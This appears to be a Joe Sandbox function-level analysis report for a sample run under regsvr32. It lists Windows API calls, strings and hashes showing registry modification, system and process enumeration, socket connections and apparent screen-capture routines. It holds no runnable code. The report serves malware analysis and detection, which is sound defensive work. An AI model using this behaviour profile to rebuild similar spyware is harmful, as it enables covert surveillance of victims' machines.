Instruction ID: 2637c92e2367458ffcdaea53360567ae03c8258771a8ec76faafa6d156bcb6cf
Opcode Fuzzy Hash: 8fccf4e8e9dfffdbce54dd016b3a3e640cc6c4c560ac19f32a706210135c0e15
Instruction Fuzzy Hash: 0B31BE76259B8186DB60DF11F85875A7360FB89BE8F449211EE9E47B98EF3CC548CB00

Function 02876860 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 328registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 028768C7
VirtualAlloc.KERNEL32 ref: 02876B4E
RegCreateKeyW.ADVAPI32 ref: 02876BD5
RegDeleteValueW.KERNEL32 ref: 02876BED
RegSetValueExW.KERNEL32 ref: 02876C13
RegCloseKey.KERNEL32 ref: 02876C20
SleepEx.KERNEL32 ref: 02876C55

Strings

l, xrefs: 02876A72
n, xrefs: 02876A84
., xrefs: 02876A60

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Value$AllocCloseCreateDeleteOpenSleepVirtual
String ID: .$l$n
API String ID: 538739324-2376909228
Opcode ID: a5c67e186459e04e5c83a4f6400f64a44d9b70a63a698b5ae6bb6dff010255c7
Instruction ID: b595c2e4237d66213ee22b95380115c6b7c4523ff8ead25772b52ffaeda8002a
Opcode Fuzzy Hash: a5c67e186459e04e5c83a4f6400f64a44d9b70a63a698b5ae6bb6dff010255c7
Instruction Fuzzy Hash: 6AB19F38618B488FEB68EF68D8847EA73E5FB99305F00452ED44EC7251EB78D545CB42

Function 02E49960 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32 ref: 02E499BC
lstrcmpiW.KERNEL32 ref: 02E499FB
lstrcmpiW.KERNEL32 ref: 02E49A0F
QueryDosDeviceW.KERNEL32 ref: 02E49A40
lstrlenW.KERNEL32 ref: 02E49A4F
lstrcpyW.KERNEL32 ref: 02E49A83
lstrcpyW.KERNEL32 ref: 02E49ACE
lstrcatW.KERNEL32 ref: 02E49ADB

Strings

A:\, xrefs: 02E499E9
B:\, xrefs: 02E49A05

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStringslstrcatlstrlen
String ID: A:\$B:\
API String ID: 1889997506-1009255891
Opcode ID: 5dc2d984e07fee21b3691a8fb012607491010a079a3f60e72f83a1abb6f6c642
Instruction ID: 53516fd987d76c88f17e8fd4a4282f7973db2f1464fa9589951c4cab5ed407d7
Opcode Fuzzy Hash: 5dc2d984e07fee21b3691a8fb012607491010a079a3f60e72f83a1abb6f6c642
Instruction Fuzzy Hash: 10316E66258AC185EF309B11F8487AB7364F798BC9F44A116DE8E97B58EF7CC145CB00

Function 02873390 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 264networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 02873405
gethostbyname.WS2_32 ref: 028734A0
connect.WS2_32 ref: 028734F2

Strings

0u, xrefs: 02873575

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: connectgethostbynamesocket
String ID: 0u
API String ID: 1495599467-3203441087
Opcode ID: f3d68191761d0edfcd14420cbcb95c442383d55f4c5bb99c35229de8d27f8cd7
Instruction ID: c1710887629bf8f057926e38be5b753781d5860a9ca710a51d922c65c4bd8b52
Opcode Fuzzy Hash: f3d68191761d0edfcd14420cbcb95c442383d55f4c5bb99c35229de8d27f8cd7
Instruction Fuzzy Hash: 08915D7461CB488FD758DF28E4457AAB7E1FB98704F104A2EE58AC3260DB74E406CB87

Function 02E48180 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32 ref: 02E481EA
GetDiskFreeSpaceExW.KERNEL32 ref: 02E4820E
GlobalMemoryStatusEx.KERNEL32 ref: 02E48275

Strings

@, xrefs: 02E4823E
%sFree%d Gb , xrefs: 02E482B7
:, xrefs: 02E481CE
HDD:%d, xrefs: 02E48289

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: DiskDriveFreeGlobalMemorySpaceStatusType
String ID: %sFree%d Gb $:$@$HDD:%d
API String ID: 3475944273-3501811827
Opcode ID: 76de7998e9de80cc2ded53d2e4fe325184efc08d04f63c850a58e7016f2c78a4
Instruction ID: 4bff84a751f0f538074be6f5ec208572da9bf9a86893e2e71bdc0815b8e1ecec
Opcode Fuzzy Hash: 76de7998e9de80cc2ded53d2e4fe325184efc08d04f63c850a58e7016f2c78a4
Instruction Fuzzy Hash: 4E312736218B8486D760DF16F84478BB7A4F389788FA06226EECD43B18DF38C556CB40

Function 02E47A90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 02E47A9A
CoCreateInstance.OLE32 ref: 02E47ABE
SysFreeString.OLEAUT32 ref: 02E47B88
CoUninitialize.OLE32 ref: 02E47BD5

Strings

FriendlyName, xrefs: 02E47B70
Network, xrefs: 02E47A90

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateFreeInitializeInstanceStringUninitialize
String ID: FriendlyName$Network
API String ID: 841178590-1437807293
Opcode ID: 84c243b931c5992d681145c8f6e0b05a35417d470a1a95b211a46464dadc8825
Instruction ID: 9e76efc5e02d90c2dbaef5fb2e219947839e56821306b50ff72531ec70a855c7
Opcode Fuzzy Hash: 84c243b931c5992d681145c8f6e0b05a35417d470a1a95b211a46464dadc8825
Instruction Fuzzy Hash: 7C311C76344A86D2DB20CF79E48479AB7A1F7D4F98F559012DA8E83B24DF38C589CB40

Function 02E489F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 02E48A1B
GetProcAddress.KERNEL32 ref: 02E48A2B
GetNativeSystemInfo.KERNEL32 ref: 02E48A3B
GetSystemInfo.KERNEL32 ref: 02E48A3F

Strings

kernel32.dll, xrefs: 02E489F6
GetNativeSystemInfo, xrefs: 02E48A21

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3433367815-192647395
Opcode ID: 89cb0620d88a823d197d8a4edb78f2da70a6a6bea98d141efa7987b94c4cb817
Instruction ID: 012b57692cc8ecd3e3fe8fd837b7560823226a5da83a4a9c5769c708997b0ebf
Opcode Fuzzy Hash: 89cb0620d88a823d197d8a4edb78f2da70a6a6bea98d141efa7987b94c4cb817
Instruction Fuzzy Hash: 36F03C36659FC586DEA0EB10F85835A73A0F398B84F845129D6CF83754EF7CC2548B10

Function 00007FFE013D5DE8 Relevance: 10.3, APIs: 8, Instructions: 271memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE013D6227
HeapCreate.KERNEL32 ref: 00007FFE013D654E
HeapAlloc.KERNEL32 ref: 00007FFE013D655E
GetLastError.KERNEL32 ref: 00007FFE013D6566
memset.MSVCRT ref: 00007FFE013D6583
HeapFree.KERNEL32 ref: 00007FFE013D7E38
HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Part of subcall function 00007FFE014380F0: malloc.MSVCRT ref: 00007FFE01438156

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLastmalloc
String ID:
API String ID: 2998993497-0
Opcode ID: 21beb2f2bf9a22f8c4a594254eb73cb50eb852875981926af0b0d6010108d291
Instruction ID: 3159f21ee5d0cc11301d9c2ddfbb134d29d3abe08cfd84bf62999ff053f2a3e8
Opcode Fuzzy Hash: 21beb2f2bf9a22f8c4a594254eb73cb50eb852875981926af0b0d6010108d291
Instruction Fuzzy Hash: DDE1397290CBC581E7758B19F8453EEA3A0FBD9344F454226EACC4AA69DF7CE585CB00

Function 00007FFE013D5D44 Relevance: 10.3, APIs: 8, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE013D6227
HeapCreate.KERNEL32 ref: 00007FFE013D654E
HeapAlloc.KERNEL32 ref: 00007FFE013D655E
GetLastError.KERNEL32 ref: 00007FFE013D6566
memset.MSVCRT ref: 00007FFE013D6583
HeapFree.KERNEL32 ref: 00007FFE013D7E38
HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLast
String ID:
API String ID: 3318353824-0
Opcode ID: 59d7772e9fab99f2178022d574e8be8db10d82b2470821197450b71fbed14ea1
Instruction ID: 555aa0f17af898188e3f43e2cbe640f93117f1308b9ca9e3c7be6228c79d2238
Opcode Fuzzy Hash: 59d7772e9fab99f2178022d574e8be8db10d82b2470821197450b71fbed14ea1
Instruction Fuzzy Hash: 70D14C62A0CBC681E7358B15E8453FEA3A1FB98748F454136DACD4AAB9DF3CE545CB00

Function 02E43660 Relevance: 7.6, APIs: 5, Instructions: 74networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 02E436F5
recv.WS2_32 ref: 02E4371B
_errno.LIBCMT ref: 02E43727
_errno.LIBCMT ref: 02E43731
_errno.LIBCMT ref: 02E4373E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$recvselect
String ID:
API String ID: 4102763267-0
Opcode ID: a87cada1dcbfab8d9f4ea9d1832976277f26580d7a4e36eb41945066a534f54b
Instruction ID: c94b3631326b06ef5f4c9439c3017e73ac41a9b7338cb08cce51053a45f6e9cd
Opcode Fuzzy Hash: a87cada1dcbfab8d9f4ea9d1832976277f26580d7a4e36eb41945066a534f54b
Instruction Fuzzy Hash: 7B317F72264AD081EB309F25F45876E73A1F789B98F54A265DF9A47B54DF38C0008B11

Function 02E47400 Relevance: 7.6, APIs: 5, Instructions: 56processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 02E47441
Process32FirstW.KERNEL32 ref: 02E47460
Process32NextW.KERNEL32 ref: 02E474A0
CloseHandle.KERNEL32 ref: 02E474AD
CloseHandle.KERNEL32 ref: 02E474D6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: 0be9ed80d58a340915f6c32b2beb49099068b08a59c1afc760e6751da2d599d4
Instruction ID: ccddffe8c5f2b1a8333175d3b66aea1c18536b61ade507b3bc308942438acc4f
Opcode Fuzzy Hash: 0be9ed80d58a340915f6c32b2beb49099068b08a59c1afc760e6751da2d599d4
Instruction Fuzzy Hash: 8421843264868085DB649B25F45C37AB7A1F7D8B98F849225DA5E46B94EF3CC504CB40

Function 02E48440 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

APIs

CreateDXGIFactory.DXGI ref: 02E484B0

Strings

%s%s %d*%d , xrefs: 02E488FD
vector<T> too long, xrefs: 02E4862F, 02E4863C, 02E48983, 02E48990
%s%s %d %d , xrefs: 02E486B0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateFactory
String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
API String ID: 1145517477-257307503
Opcode ID: 32845b5ceee2c9c9111369cf511fee31bcf8c5e9523092c1b243209fcc5ace9d
Instruction ID: ca68c3b835976bec161dbd721fe474331251a28a2f8131bc54e5dcc77b8fa562
Opcode Fuzzy Hash: 32845b5ceee2c9c9111369cf511fee31bcf8c5e9523092c1b243209fcc5ace9d
Instruction Fuzzy Hash: 4FD1F472754A8486DF10CF66E8542AE7362F788BE8F54A621DF6E27B98DF38C445C700

Function 02E5BA94 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 02E5BAAA
GetVersion.KERNEL32 ref: 02E5BABC
HeapSetInformation.KERNEL32 ref: 02E5BADA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: 90aacd7874f7576210f1b8e18ccfcd6701819cf72a36e26adf16026e4497063d
Instruction ID: 678785947e3a26c88272a4c2065b06f4e2f56cc72ce0276193b60b4516223273
Opcode Fuzzy Hash: 90aacd7874f7576210f1b8e18ccfcd6701819cf72a36e26adf16026e4497063d
Instruction Fuzzy Hash: BDE0D834261AD182FB455755F80D75A3311F798389F806018EA4F43F44EF3CC0458710

Function 00007FFE013ED4A0 Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFE013ED500
RtlNtStatusToDosError.NTDLL ref: 00007FFE013ED51D

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: ErrorObjectSingleStatusWait
String ID:
API String ID: 4189389217-0
Opcode ID: 662beb7d9e6edd52112540eca7aec0ccd9460185057df25c63a49af0507912b4
Instruction ID: 67c5d8aecd75f2249ecb4613d5995048472c7deaca999a487bec36e8296f6ddb
Opcode Fuzzy Hash: 662beb7d9e6edd52112540eca7aec0ccd9460185057df25c63a49af0507912b4
Instruction Fuzzy Hash: 2E219122F18B8189F710CB74E4403ED27A1EBA8358F549231EA5D46AE9EF3CE1D18740

Function 00007FFE01421FE0 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

Invalid checksum, xrefs: 00007FFE014221F4
corrupt deflate stream, xrefs: 00007FFE014221E3

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID: Invalid checksum$corrupt deflate stream
API String ID: 3510742995-685916775
Opcode ID: 5aab9deb5222d04c7bb8ae061be233dd5d40db04599e2760f6d483d1f2c93055
Instruction ID: 93317a11237ca27b19784383742a5b32438aea8b9e0bab50a3df4517871f36ce
Opcode Fuzzy Hash: 5aab9deb5222d04c7bb8ae061be233dd5d40db04599e2760f6d483d1f2c93055
Instruction Fuzzy Hash: F481AF72A18B818ADB64CB25E440BAEB7A1FB55780F904035DB8E4BB75DF7DE085C701

Function 02E4F080 Relevance: 34.7, APIs: 23, Instructions: 201
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32 ref: 02E4F0CA
GlobalLock.KERNEL32 ref: 02E4F0D6
GlobalUnlock.KERNEL32 ref: 02E4F0ED
CreateStreamOnHGlobal.OLE32 ref: 02E4F102
EnterCriticalSection.KERNEL32 ref: 02E4F14B
LeaveCriticalSection.KERNEL32 ref: 02E4F15E
GdipCreateBitmapFromStream.GDIPLUS ref: 02E4F18E
GdipDisposeImage.GDIPLUS ref: 02E4F1A5
GdipDisposeImage.GDIPLUS ref: 02E4F1C3
CreateStreamOnHGlobal.OLE32 ref: 02E4F1E2
GetHGlobalFromStream.OLE32 ref: 02E4F20D
GlobalLock.KERNEL32 ref: 02E4F218
GlobalFree.KERNEL32 ref: 02E4F233
DeleteObject.GDI32 ref: 02E4F338
EnterCriticalSection.KERNEL32 ref: 02E4F345
EnterCriticalSection.KERNEL32 ref: 02E4F35A
GdiplusShutdown.GDIPLUS ref: 02E4F36C
LeaveCriticalSection.KERNEL32 ref: 02E4F380
LeaveCriticalSection.KERNEL32 ref: 02E4F38D
GlobalFree.KERNEL32 ref: 02E4F396

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$DisposeFreeFromImageLock$AllocBitmapDeleteGdiplusObjectShutdownUnlock
String ID:
API String ID: 562715702-0
Opcode ID: 1f20682f04d03fbf3385fc7b2c80d26b451ef2743fd3ada5c9c0ffae22fdbc8f
Instruction ID: 1d1739bbfbea88671700f511778c55c9016b2c1db6f200e5f9037ee0292ba4db
Opcode Fuzzy Hash: 1f20682f04d03fbf3385fc7b2c80d26b451ef2743fd3ada5c9c0ffae22fdbc8f
Instruction Fuzzy Hash: A7912436784B818AEB10DBA1F85839D33B1F798BA8F005615DE9E57EA8DF38C149C750

Function 02E4CC50 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 225
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImageEncodersSize.GDIPLUS ref: 02E4CC8E
malloc.LIBCMT ref: 02E4CCFA
free.LIBCMT ref: 02E4CD26
GdipGetImageEncoders.GDIPLUS ref: 02E4CD3F
free.LIBCMT ref: 02E4CD56
free.LIBCMT ref: 02E4CE2B
GdipCreateBitmapFromScan0.GDIPLUS ref: 02E4CE72
GdipSaveImageToStream.GDIPLUS ref: 02E4CE89
GdipDisposeImage.GDIPLUS ref: 02E4CE96
free.LIBCMT ref: 02E4CEAB
GdipCreateBitmapFromHBITMAP.GDIPLUS ref: 02E4CEC5
GdipSaveImageToStream.GDIPLUS ref: 02E4CEDC
GdipDisposeImage.GDIPLUS ref: 02E4CEE9
free.LIBCMT ref: 02E4CF06
GdipDisposeImage.GDIPLUS ref: 02E4CF15
free.LIBCMT ref: 02E4CF26

Strings

&, xrefs: 02E4CE5D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Gdip$Image$free$Dispose$BitmapCreateEncodersFromSaveStream$Scan0Sizemalloc
String ID: &
API String ID: 1890951399-3042966939
Opcode ID: 1b113133b1d1c7f617ae231253ae617589de5df3b5f4aa67eb334f1dad3f7bec
Instruction ID: 112298e8a9e9222d9a5f87cb26d4a8b86b917d5e22a89a8984376d4f9a868a30
Opcode Fuzzy Hash: 1b113133b1d1c7f617ae231253ae617589de5df3b5f4aa67eb334f1dad3f7bec
Instruction Fuzzy Hash: 7071B022392A8096DF149F31E8047A92765F759BDCFA8F623DE1A47B94EF38D145C340

Function 02E47F70 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02E47FA5
wsprintfW.USER32 ref: 02E47FBC

Part of subcall function 02E47D90: GetCurrentProcessId.KERNEL32 ref: 02E47DAD
Part of subcall function 02E47D90: OpenProcess.KERNEL32 ref: 02E47DBD
Part of subcall function 02E47D90: OpenProcessToken.ADVAPI32 ref: 02E47DE5
Part of subcall function 02E47D90: CloseHandle.KERNEL32 ref: 02E47DF2

GetVersionExW.KERNEL32 ref: 02E47FEB
GetCurrentProcess.KERNEL32 ref: 02E48014
OpenProcessToken.ADVAPI32 ref: 02E48025
GetTokenInformation.ADVAPI32 ref: 02E4804F
GetLastError.KERNEL32 ref: 02E48059
LocalAlloc.KERNEL32 ref: 02E48073
GetTokenInformation.ADVAPI32 ref: 02E4809B
GetSidSubAuthorityCount.ADVAPI32 ref: 02E480A9
GetSidSubAuthority.ADVAPI32 ref: 02E480B8
LocalFree.KERNEL32 ref: 02E480C3
CloseHandle.KERNEL32 ref: 02E480D6
wsprintfW.USER32 ref: 02E48135

Strings

-N/, xrefs: 02E48112
NO/, xrefs: 02E4811B
None/%s, xrefs: 02E48124

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion
String ID: -N/$NO/$None/%s
API String ID: 4155081256-3095023699
Opcode ID: eabe9c37c142d0c42af826881d2ffa50fe86e3bf6b1343313f3b0a9839f108bd
Instruction ID: 1a37c2f57057a4fa00898f04f18dfc21a3735241db38e42aa52936070d277666
Opcode Fuzzy Hash: eabe9c37c142d0c42af826881d2ffa50fe86e3bf6b1343313f3b0a9839f108bd
Instruction Fuzzy Hash: 43515F31298BC1C6EB64DF21F8987AA7361F799BC8F446026DA4B47B54DF38C549CB10

Function 02E4C830 Relevance: 27.3, APIs: 18, Instructions: 283
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImagePixelFormat.GDIPLUS ref: 02E4C86F
GdipGetImageHeight.GDIPLUS ref: 02E4C8D8
GdipGetImageWidth.GDIPLUS ref: 02E4C8F6
GdipGetImagePaletteSize.GDIPLUS ref: 02E4C93C
malloc.LIBCMT ref: 02E4C9A2

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

free.LIBCMT ref: 02E4C9CB
GdipGetImagePalette.GDIPLUS ref: 02E4C9EA
GdipBitmapLockBits.GDIPLUS ref: 02E4CAA7
free.LIBCMT ref: 02E4CAC6
GdipCreateBitmapFromScan0.GDIPLUS ref: 02E4CBBF
GdipGetImageGraphicsContext.GDIPLUS ref: 02E4CBD4
GdipDrawImageI.GDIPLUS ref: 02E4CBEC
GdipDeleteGraphics.GDIPLUS ref: 02E4CBF5
GdipDisposeImage.GDIPLUS ref: 02E4CBFE
free.LIBCMT ref: 02E4CAE6

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

memcpy_s.LIBCMT ref: 02E4CB2C
GdipBitmapUnlockBits.GDIPLUS ref: 02E4CB68
free.LIBCMT ref: 02E4CC16

